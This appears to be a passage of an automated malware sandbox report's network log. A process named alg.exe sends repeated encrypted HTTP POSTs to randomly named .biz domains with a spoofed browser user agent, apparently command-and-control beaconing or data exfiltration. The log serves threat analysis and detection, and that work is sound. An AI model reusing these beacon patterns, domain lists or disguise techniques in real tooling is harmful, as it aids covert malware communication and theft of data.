Oct 28, 2024 16:51:43.085338116 CET | 778 | OUT | Data Raw: 36 6e 6f 1d ed 22 05 82 fe 02 00 00 2d 59 fc ba a3 f6 27 17 5b 85 ee fc 8f f3 81 ec b4 ae d2 61 1a cc 94 da b5 96 ab f9 2c da b5 31 11 d3 61 8e 63 fe 86 10 22 73 a4 71 0c 56 64 f0 0a 48 3f 29 42 fe 44 18 74 e4 4b 26 b6 d3 c9 ed 89 5f aa 33 13 34
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 6no"-Y'[a,1ac"sqVdH?)BDtK&_34 ?P&eF+CM7Velu+nV#>:W$U*g:M1?C:yK+s'~&yD.x[i5D `L{m% ^Y[
Oct 28, 2024 16:51:44.062854052 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=afeebabb8ada25940beeb5e9d71b8cfb|155.94.241.188|1730130703|1730130703|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.5 | 50040 | 47.129.31.212 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:44.085705042 CET | 353 | OUT | POST /taltetnl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:44.085737944 CET | 778 | OUT | Data Raw: [binary payload omitted]
Oct 28, 2024 16:51:45.517138004 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=5aa9f8852031495d19eae109a4e83556|155.94.241.188|1730130705|1730130705|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.5 | 50041 | 3.94.10.34 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:45.539834976 CET | 345 | OUT | POST /s HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:45.542960882 CET | 778 | OUT | Data Raw: [binary payload omitted]
Oct 28, 2024 16:51:46.217255116 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=a88bdcd6f3a9bd870a8417fe81033487|155.94.241.188|1730130706|1730130706|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.5 | 50042 | 35.164.78.200 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:46.264581919 CET | 357 | OUT | POST /yasnhmosjfaqm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:46.264606953 CET | 778 | OUT | Data Raw: [binary payload omitted]
Oct 28, 2024 16:51:47.093986988 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=7506ed47ac33bd476a649b593811e1a5|155.94.241.188|1730130706|1730130706|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.5 | 50043 | 18.141.10.107 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:47.212018013 CET | 347 | OUT | POST /oogcd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.212018013 CET778OUTData Raw: d4 86 db 0e 90 a3 d2 81 fe 02 00 00 4d 11 6f 39 24 b0 1f 41 ed 8a 0b 18 f7 90 a1 77 23 a6 98 53 90 e2 96 0b a2 55 75 ae 90 4a 67 68 d6 62 92 6a e7 68 ca 85 58 3b 3b 32 18 08 d0 8a 20 c6 b0 85 67 54 ea 87 a7 8b 47 f4 8f ca d9 a6 73 f5 dc b0 58 1f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Mo9$Aw#SUuJghbjhX;;2 gTGsXkw\|TJqT%<[JuE^4~W{Y8ZAC6+kjM{KWOtck|52aR^G\7cz$ON'k{F&3]1Tf
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.629209042 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=8dff23a9b5d1dde2d75e12504c62f33b|155.94.241.188|1730130708|1730130708|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
68          192.168.2.5  50044        44.221.84.105   80                2636  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:51:48.959253073 CET  351  OUT  POST /srbpajvg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:48.959253073 CET  778  OUT  Data Raw: 27 f5 37 5e 5a 84 57 d6 fe 02 00 00 f9 3b d4 d4 e8 07 b8 90 0f ae 42 93 cc 99 6b 25 61 e3 51 29 10 fb 29 72 c5 bd 5a 2c 42 e4 a1 2b e9 50 8c 83 a8 dd 3e d6 91 d6 b9 ec 4e 2e fd 10 e7 b3 45 ec 3c 6a e3 1f 7b 2c 6c 43 2d 34 a6 96 d6 b4 b4 87 12 40
Data Ascii: '7^ZW;Bk%aQ))rZ,B+P>N.E<j{,lC-4@DN)olvk_&l]$LI O(y8Ir5LsN<@e8req}Yd|!So++k8Gtt[j[0ap*q=>'ImRF
Oct 28, 2024 16:51:49.634098053 CET  415  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=94243503b8cc9a3ec2a670ef8a1e4ddc|155.94.241.188|1730130709|1730130709|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
69          192.168.2.5  50045        34.211.97.45    80                2636  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:51:49.841701031 CET  343  OUT  POST /i HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:49.841715097 CET  778  OUT  Data Raw: 50 ad 65 05 3e f5 9a 80 fe 02 00 00 9f 64 8e df 93 37 59 13 18 64 11 90 dd 1f d0 1a 9b 9b 09 35 c7 70 44 b0 eb 0e e3 d1 19 d3 28 ec d0 4a e1 28 a5 08 47 5f c4 00 91 55 73 49 70 20 d4 95 ab 7c c0 e0 4c 56 74 6a fb 96 49 c1 cc 21 09 38 ec db e6 f7
Data Ascii: Pe>d7Yd5pD(J(G_UsIp |LVtjI!8!tE_D\o(F'!9j)`A7!?dtZ1M]ti\`{$Fc+G_{T9~1<PvJEUm_,S).5xr
Oct 28, 2024 16:51:50.903523922 CET  414  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cced32451f2dd47d89292eaf67424b65|155.94.241.188|1730130710|1730130710|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
70          192.168.2.5  50046        18.208.156.248  80                2636  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:51:50.923712015 CET  351  OUT  POST /dnmujj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: damcprvgv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:50.923747063 CET778OUTData Raw: 45 52 d0 16 ef 98 77 f9 fe 02 00 00 e4 53 c1 63 55 f6 51 4e 61 94 c8 72 46 2f de e5 86 75 ca 1b 92 b2 94 d5 84 fa 7a 4c 10 d5 a7 8d b3 ec cf 15 9e 19 4f d8 82 69 c0 b5 4a 60 21 12 2e 89 b6 56 3a a8 45 bb 55 b6 20 ec d7 50 b9 47 7a b8 00 b5 35 4e
Oct 28, 2024 16:51:51.627598047 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a5c475f4b7b33185b36d930d1f668fbe|155.94.241.188|1730130711|1730130711|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.5 | 50047 | 3.254.94.185 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:51.648871899 CET | 345 | OUT | POST /jw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ocsvqjg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:51.648905039 CET | 778 | OUT | Data Raw: 71 3a 04 29 62 2e 13 73 fe 02 00 00 42 e2 53 2b d4 dd f8 36 d7 fc f2 36 cb 2d 91 00 fb f8 82 b4 68 8b f3 60 85 69 6e 3b 04 49 ea 69 3b 77 3d f6 82 a1 53 fa a2 1b 08 4b df 5c 86 c3 70 3e da bb 61 b6 93 50 e3 0d 29 d4 73 96 26 14 5e 91 a7 01 27 c8
Oct 28, 2024 16:51:52.612293959 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=da41906060fa2e0f2078de0300e2016e|155.94.241.188|1730130712|1730130712|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.5 | 50048 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:52.633246899 CET | 356 | OUT | POST /cssyiwvwfakxyln HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ywffr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:52.633289099 CET | 778 | OUT | Data Raw: fe 6a 6c 86 07 8d 8f bc fe 02 00 00 2b 1c a1 76 d5 ed 9b 5e 4c 7c 48 2e 3a a1 bb 78 5e f4 99 37 91 7a 54 6d c3 ec 53 64 a2 53 23 c2 aa 60 cf f3 bc 03 e9 f5 39 0d e7 4d 62 3b af 59 db 35 06 34 58 2a 5b 8d 66 8c 64 e8 73 07 5a e1 9d a2 6b eb 13 1a
Oct 28, 2024 16:51:53.479470968 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2d7a26618c254e15df1440ab7edb22fe|155.94.241.188|1730130713|1730130713|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.5 | 50049 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:53.503767967 CET | 346 | OUT | POST /asvi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ecxbwt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:53.503797054 CET | 778 | OUT | Data Raw: 28 21 9a 2d eb fd d2 67 fe 02 00 00 a5 4a f6 3a 79 03 5b 41 9b 3b ae f1 0c 26 07 ce 28 18 25 43 fd 28 fb d9 59 b9 4f 1f 9b 73 f8 f6 ba 93 09 b6 b5 5c 72 61 23 eb 40 db f3 cd 53 89 f7 f9 03 59 f0 20 0b a7 1e 2a de 70 61 76 d5 10 ea fa 84 29 c8 48
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: (!-gJ:y[A;&(%C(YOs\ra#@SY *pav)HBXN#p^0n{[]8w{]mZc5r1_2}4~|bJ/8Fx$q-3w^M?{@4q0,+8+wM*_]$
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:54.333273888 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=c1d3183ad2bebd53e89b7a69197984f1|155.94.241.188|1730130714|1730130714|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.5 | 50050 | 18.246.231.120 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:54.354605913 CET | 354 | OUT | POST /dnnoxqpiwspjj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pectx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:54.354635000 CET | 778 | OUT | Data Raw: ec 48 8b ea c8 ed 2e 8b fe 02 00 00 d9 38 e5 44 52 2a 78 12 c5 ea cf 89 ce b6 8a 68 ab 41 3d a4 12 a2 06 34 8a 4a 8e e4 6f f2 eb 09 8d da a5 cf 75 9a 90 dd bf ec db 39 b7 ee 54 5e 3e 41 ff 65 6d 32 3d 8e c2 f8 df 5a 7f 4e d9 3b a6 93 d6 45 20 8d
Data Ascii: H.8DR*xhA=4Jou9T^>Aem2=ZN;E p;|wz^Xvo'3nv}nZC3kp,2z&e28@:/l\m\PpM_?IZc;TK5t' yKpDZCZ#
Oct 28, 2024 16:51:55.194593906 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9f233f36ed594b882eda9049fb36df9f|155.94.241.188|1730130715|1730130715|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.5 | 50051 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:55.654402971 CET | 352 | OUT | POST /srcxcicm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zyiexezl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:55.654433966 CET | 778 | OUT | Data Raw: 77 13 b1 70 9b 56 1f c7 fe 02 00 00 1b 23 db cf 18 d6 06 a4 ae 8e c3 b7 01 ea 13 fd d6 a1 ea cb 1e 11 43 53 ae d0 3d d8 39 dc 1a 5e 71 2e 43 e4 c9 54 da 71 de fe f0 d8 d0 62 ca 86 82 87 87 1a 92 65 e8 25 9f 78 05 e9 b9 8f fe 1a e1 0e 84 b9 c6 69
Data Ascii: wpV#CS=9^q.CTqbe%xi.h<1;,}e(n7D~me>q/?~Wo%10:W#CM:/6mH[t|%W*+o{fPev5@2gyx$
Oct 28, 2024 16:51:56.322695017 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6e41551babe52d46a5c6b4b7b0b96913|155.94.241.188|1730130716|1730130716|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.5 | 50052 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:56.342493057 CET | 354 | OUT | POST /ydbxvrfdujat HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: banwyw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:56.342518091 CET | 778 | OUT | Data Raw: 6f 35 62 8d 65 81 34 35 fe 02 00 00 4e c4 02 d0 73 e9 e4 10 9b 2d 39 4f 85 11 59 0f ab 8c 39 4d ed 2a f0 22 74 1a 3a 03 f2 20 af 97 3b 56 9b 8a 00 c0 6c ad d5 65 e2 55 95 97 38 00 3e 26 f1 10 bd 30 af 6e cc 1d bd a7 2d db d0 2a 3d c2 b0 0e 5f ab
Data Ascii: o5be45Ns-9OY9M*"t: ;VleU8>&0n-*=_F%S$*b#;?5?9&3!>Km21W]|]M$#)6NFUO{#@QWu:TwtJDL@F:@UXY
Oct 28, 2024 16:51:57.040076017 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:56 GMT
Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=18e8389e49648dcd77c0c6416d712d1c|155.94.241.188|1730130716|1730130716|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.5 | 50053 | 72.52.178.23 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:57.068813086 CET | 356 | OUT | POST /otrjjjdmycgv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wxgzshna.biz
